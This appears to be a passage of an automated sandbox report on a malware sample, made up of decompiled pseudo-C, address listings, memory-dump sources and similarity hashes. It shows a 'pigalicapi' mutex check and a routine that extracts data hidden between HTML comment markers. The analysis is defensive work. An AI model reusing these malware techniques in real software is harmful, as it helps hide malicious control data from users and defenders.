                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t62 = _t61 - 0x10;
                                                                                                                                                                                                                                                                                                        				_t24 = E004102F0(_t46, _t49, _t50, _t54, _t55);
                                                                                                                                                                                                                                                                                                        				_t47 = _t24;
                                                                                                                                                                                                                                                                                                        				if(_t24 == 0 || ( *(_t24 + 0x20) & 0x0000000c) != 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t24;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t25 =  *0x422438; // 0xe727a0
                                                                                                                                                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_v24 = 4;
                                                                                                                                                                                                                                                                                                        						 *_t62 = "_pthread_cancelling_shmem"; // executed
                                                                                                                                                                                                                                                                                                        						_t24 = E00414330(__eflags); // executed
                                                                                                                                                                                                                                                                                                        						 *0x422438 = _t24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if( *_t24 != 0) {
                                                                                                                                                                                                                                                                                                        						_t5 = _t47 + 0x1c; // 0x1c
                                                                                                                                                                                                                                                                                                        						_t57 = _t5;
                                                                                                                                                                                                                                                                                                        						 *_t62 = _t57;
                                                                                                                                                                                                                                                                                                        						E00413FD0();
                                                                                                                                                                                                                                                                                                        						_t27 =  *(_t47 + 0x20) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						__eflags = _t27 & 0x00000003;
                                                                                                                                                                                                                                                                                                        						if((_t27 & 0x00000003) == 0) {
                                                                                                                                                                                                                                                                                                        							L8:
                                                                                                                                                                                                                                                                                                        							 *_t62 = _t57;
                                                                                                                                                                                                                                                                                                        							return E00413A00(_t49);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t51 =  *(_t47 + 0x24);
                                                                                                                                                                                                                                                                                                        							__eflags = _t51 & 0x00000001;
                                                                                                                                                                                                                                                                                                        							if((_t51 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                        								goto L8;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t49 =  *(_t47 + 0x10);
                                                                                                                                                                                                                                                                                                        								__eflags =  *(_t47 + 0x10);
                                                                                                                                                                                                                                                                                                        								if( *(_t47 + 0x10) <= 0) {
                                                                                                                                                                                                                                                                                                        									_t52 = _t51 & 0xfffffffe;
                                                                                                                                                                                                                                                                                                        									 *(_t47 + 0x20) = _t27 & 0xfffffff3 | 0x00000004;
                                                                                                                                                                                                                                                                                                        									_t31 =  *(_t47 + 0x18);
                                                                                                                                                                                                                                                                                                        									 *(_t47 + 0x24) = _t52;
                                                                                                                                                                                                                                                                                                        									__eflags = _t31;
                                                                                                                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                                                                                                                        										 *_t62 = _t31;
                                                                                                                                                                                                                                                                                                        										ResetEvent(??);
                                                                                                                                                                                                                                                                                                        										_push(_t47);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									 *_t62 = _t57;
                                                                                                                                                                                                                                                                                                        									E00413A00(_t49);
                                                                                                                                                                                                                                                                                                        									E00412120();
                                                                                                                                                                                                                                                                                                        									_push(_t57);
                                                                                                                                                                                                                                                                                                        									_push(_t47);
                                                                                                                                                                                                                                                                                                        									_t65 = _t62 - 0x10;
                                                                                                                                                                                                                                                                                                        									_t33 = _v24;
                                                                                                                                                                                                                                                                                                        									__eflags = _t33;
                                                                                                                                                                                                                                                                                                        									if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        										E004102F0(_t47, _t49, _t52, _t54, _t57);
                                                                                                                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										 *_t65 = _t33;
                                                                                                                                                                                                                                                                                                        										_t38 = E00415BD0();
                                                                                                                                                                                                                                                                                                        										__eflags = _t52;
                                                                                                                                                                                                                                                                                                        										if(_t52 <= 0) {
                                                                                                                                                                                                                                                                                                        											__eflags = _t38 - 0xfffffffe;
                                                                                                                                                                                                                                                                                                        											if(_t38 > 0xfffffffe) {
                                                                                                                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_t48 = _t38;
                                                                                                                                                                                                                                                                                                        												_t44 = E004102F0(_t48, _t49, _t52, _t54, _t57);
                                                                                                                                                                                                                                                                                                        												__eflags = _t48;
                                                                                                                                                                                                                                                                                                        												_t58 = _t44;
                                                                                                                                                                                                                                                                                                        												if(_t48 != 0) {
                                                                                                                                                                                                                                                                                                        													goto L16;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													L21:
                                                                                                                                                                                                                                                                                                        													E00412210();
                                                                                                                                                                                                                                                                                                        													 *_t65 = 0;
                                                                                                                                                                                                                                                                                                        													Sleep(??);
                                                                                                                                                                                                                                                                                                        													E00412210();
                                                                                                                                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                                                                                                                                        													return 0;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											L15:
                                                                                                                                                                                                                                                                                                        											_t39 = E004102F0(_t47, _t49, _t52, _t54, _t57);
                                                                                                                                                                                                                                                                                                        											_t48 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        											_t58 = _t39;
                                                                                                                                                                                                                                                                                                        											L16:
                                                                                                                                                                                                                                                                                                        											E00412210();
                                                                                                                                                                                                                                                                                                        											_t53 =  *(_t58 + 0x18);
                                                                                                                                                                                                                                                                                                        											__eflags = _t53;
                                                                                                                                                                                                                                                                                                        											if(_t53 == 0) {
                                                                                                                                                                                                                                                                                                        												 *_t65 = _t48;
                                                                                                                                                                                                                                                                                                        												Sleep(??);
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_v52 = _t48;
                                                                                                                                                                                                                                                                                                        												 *_t65 = _t53;
                                                                                                                                                                                                                                                                                                        												WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											E00412210();
                                                                                                                                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                                                                                                                                        											return 0;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}

































                                                                                                                                                                                                                                                                                                        0x00412215
                                                                                                                                                                                                                                                                                                        0x00412218
                                                                                                                                                                                                                                                                                                        0x0041221f
                                                                                                                                                                                                                                                                                                        0x00412221
                                                                                                                                                                                                                                                                                                        0x00412238
                                                                                                                                                                                                                                                                                                        0x0041223e
                                                                                                                                                                                                                                                                                                        0x00412229
                                                                                                                                                                                                                                                                                                        0x00412229
                                                                                                                                                                                                                                                                                                        0x00412230
                                                                                                                                                                                                                                                                                                        0x00412271
                                                                                                                                                                                                                                                                                                        0x00412279
                                                                                                                                                                                                                                                                                                        0x00412281
                                                                                                                                                                                                                                                                                                        0x00412288
                                                                                                                                                                                                                                                                                                        0x0041228d
                                                                                                                                                                                                                                                                                                        0x0041228d
                                                                                                                                                                                                                                                                                                        0x00412236
                                                                                                                                                                                                                                                                                                        0x00412240
                                                                                                                                                                                                                                                                                                        0x00412240
                                                                                                                                                                                                                                                                                                        0x00412243
                                                                                                                                                                                                                                                                                                        0x00412246
                                                                                                                                                                                                                                                                                                        0x0041224b
                                                                                                                                                                                                                                                                                                        0x0041224f
                                                                                                                                                                                                                                                                                                        0x00412251
                                                                                                                                                                                                                                                                                                        0x00412262
                                                                                                                                                                                                                                                                                                        0x00412262
                                                                                                                                                                                                                                                                                                        0x00412270
                                                                                                                                                                                                                                                                                                        0x00412253
                                                                                                                                                                                                                                                                                                        0x00412253
                                                                                                                                                                                                                                                                                                        0x00412256
                                                                                                                                                                                                                                                                                                        0x00412259
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041225b
                                                                                                                                                                                                                                                                                                        0x0041225b
                                                                                                                                                                                                                                                                                                        0x0041225e
                                                                                                                                                                                                                                                                                                        0x00412260
                                                                                                                                                                                                                                                                                                        0x00412297
                                                                                                                                                                                                                                                                                                        0x0041229d
                                                                                                                                                                                                                                                                                                        0x004122a0
                                                                                                                                                                                                                                                                                                        0x004122a3
                                                                                                                                                                                                                                                                                                        0x004122a6
                                                                                                                                                                                                                                                                                                        0x004122a8
                                                                                                                                                                                                                                                                                                        0x004122aa
                                                                                                                                                                                                                                                                                                        0x004122ad
                                                                                                                                                                                                                                                                                                        0x004122b3
                                                                                                                                                                                                                                                                                                        0x004122b3
                                                                                                                                                                                                                                                                                                        0x004122b4
                                                                                                                                                                                                                                                                                                        0x004122b7
                                                                                                                                                                                                                                                                                                        0x004122bc
                                                                                                                                                                                                                                                                                                        0x004122d3
                                                                                                                                                                                                                                                                                                        0x004122d4
                                                                                                                                                                                                                                                                                                        0x004122d5
                                                                                                                                                                                                                                                                                                        0x004122d8
                                                                                                                                                                                                                                                                                                        0x004122db
                                                                                                                                                                                                                                                                                                        0x004122dd
                                                                                                                                                                                                                                                                                                        0x00412357
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004122df
                                                                                                                                                                                                                                                                                                        0x004122df
                                                                                                                                                                                                                                                                                                        0x004122e2
                                                                                                                                                                                                                                                                                                        0x004122e7
                                                                                                                                                                                                                                                                                                        0x004122ea
                                                                                                                                                                                                                                                                                                        0x00412322
                                                                                                                                                                                                                                                                                                        0x00412325
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412327
                                                                                                                                                                                                                                                                                                        0x00412327
                                                                                                                                                                                                                                                                                                        0x00412329
                                                                                                                                                                                                                                                                                                        0x0041232e
                                                                                                                                                                                                                                                                                                        0x00412330
                                                                                                                                                                                                                                                                                                        0x00412332
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412334
                                                                                                                                                                                                                                                                                                        0x00412334
                                                                                                                                                                                                                                                                                                        0x00412334
                                                                                                                                                                                                                                                                                                        0x00412339
                                                                                                                                                                                                                                                                                                        0x00412340
                                                                                                                                                                                                                                                                                                        0x00412349
                                                                                                                                                                                                                                                                                                        0x00412351
                                                                                                                                                                                                                                                                                                        0x00412356
                                                                                                                                                                                                                                                                                                        0x00412356
                                                                                                                                                                                                                                                                                                        0x00412332
                                                                                                                                                                                                                                                                                                        0x004122ec
                                                                                                                                                                                                                                                                                                        0x004122ec
                                                                                                                                                                                                                                                                                                        0x004122ec
                                                                                                                                                                                                                                                                                                        0x004122f1
                                                                                                                                                                                                                                                                                                        0x004122f6
                                                                                                                                                                                                                                                                                                        0x004122f8
                                                                                                                                                                                                                                                                                                        0x004122f8
                                                                                                                                                                                                                                                                                                        0x004122fd
                                                                                                                                                                                                                                                                                                        0x00412300
                                                                                                                                                                                                                                                                                                        0x00412302
                                                                                                                                                                                                                                                                                                        0x00412360
                                                                                                                                                                                                                                                                                                        0x00412363
                                                                                                                                                                                                                                                                                                        0x00412304
                                                                                                                                                                                                                                                                                                        0x00412304
                                                                                                                                                                                                                                                                                                        0x00412308
                                                                                                                                                                                                                                                                                                        0x0041230b
                                                                                                                                                                                                                                                                                                        0x00412311
                                                                                                                                                                                                                                                                                                        0x00412314
                                                                                                                                                                                                                                                                                                        0x0041231c
                                                                                                                                                                                                                                                                                                        0x00412321
                                                                                                                                                                                                                                                                                                        0x00412321
                                                                                                                                                                                                                                                                                                        0x004122ea
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412260
                                                                                                                                                                                                                                                                                                        0x00412259
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412236

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 03044a26b96f7e7b193780177aff1d621ad6876101750b721eb7a4098160cad1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C931E7716042048BDB10BFB996852DFBBA4EF04364F5406AEEC94C7241D7BCD9E0879B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: h%$%
                                                                                                                                                                                                                                                                                                        • API String ID: 0-3251446214
                                                                                                                                                                                                                                                                                                        • Opcode ID: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
                                                                                                                                                                                                                                                                                                        • Instruction ID: b4ea5088bbc2e04cae5ca264721ad58746302421d82bc6471c19b5581d7aa8aa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10311EB0608301DEE720EF61D59031ABAF4AB40344F44C83E9985AB695D7BC944ADF6A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: memsetrealloc
                                                                                                                                                                                                                                                                                                        • String ID: HY
                                                                                                                                                                                                                                                                                                        • API String ID: 3488966140-1821855334
                                                                                                                                                                                                                                                                                                        • Opcode ID: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
                                                                                                                                                                                                                                                                                                        • Instruction ID: dad7b14d47605fe78516e20dfcd52e82a159e52376bfce22ed144a28b74165c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68D15CB0704305EFD720EF15E68079ABBF0AB84344F90882EE6858B361D7B99485CB5E
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: memsetrealloc
                                                                                                                                                                                                                                                                                                        • String ID: HY
                                                                                                                                                                                                                                                                                                        • API String ID: 3488966140-1821855334
                                                                                                                                                                                                                                                                                                        • Opcode ID: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1e92ba9ca6738bd07df40508bbb0f1f8677d13f166ee6327e985d8f32876cbf7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E411C703003059FD720DF2ADA80B9A77E4EB45744F84452AEA59CB375E779E881CB58
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04005E00() {
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                                                        				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                                                                        0x04005e0c
                                                                                                                                                                                                                                                                                                        0x04005e25

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                        • String ID: pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                                                        • Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                                                        • Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v13;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				char _t48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                                                                                                                        				char _t63;
                                                                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_v20 = _a4;
                                                                                                                                                                                                                                                                                                        					_v13 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                                                        						_v32 = _t48;
                                                                                                                                                                                                                                                                                                        						_t63 =  *0x400c700; // 0x0
                                                                                                                                                                                                                                                                                                        						_v28 = _t63;
                                                                                                                                                                                                                                                                                                        						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                                                        						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v24 = _t51;
                                                                                                                                                                                                                                                                                                        						if(_v24 == 0) {
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                                                        							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                                                        							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                                                        							if(_v36 != 0) {
                                                                                                                                                                                                                                                                                                        								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                                                        								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                        								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                                                        								_v40 = _t58;
                                                                                                                                                                                                                                                                                                        								if(_v40 > 0) {
                                                                                                                                                                                                                                                                                                        									_v13 = 1;
                                                                                                                                                                                                                                                                                                        									_v8 = _v40;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L16:
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x04008256
                                                                                                                                                                                                                                                                                                        0x04008261
                                                                                                                                                                                                                                                                                                        0x04008285
                                                                                                                                                                                                                                                                                                        0x0400828f
                                                                                                                                                                                                                                                                                                        0x04008292
                                                                                                                                                                                                                                                                                                        0x04008296
                                                                                                                                                                                                                                                                                                        0x040082b1
                                                                                                                                                                                                                                                                                                        0x040082b6
                                                                                                                                                                                                                                                                                                        0x040082b9
                                                                                                                                                                                                                                                                                                        0x040082bf
                                                                                                                                                                                                                                                                                                        0x040082d6
                                                                                                                                                                                                                                                                                                        0x040082db
                                                                                                                                                                                                                                                                                                        0x040082de
                                                                                                                                                                                                                                                                                                        0x040082e5
                                                                                                                                                                                                                                                                                                        0x040082e7
                                                                                                                                                                                                                                                                                                        0x040082ed
                                                                                                                                                                                                                                                                                                        0x040082fb
                                                                                                                                                                                                                                                                                                        0x04008306
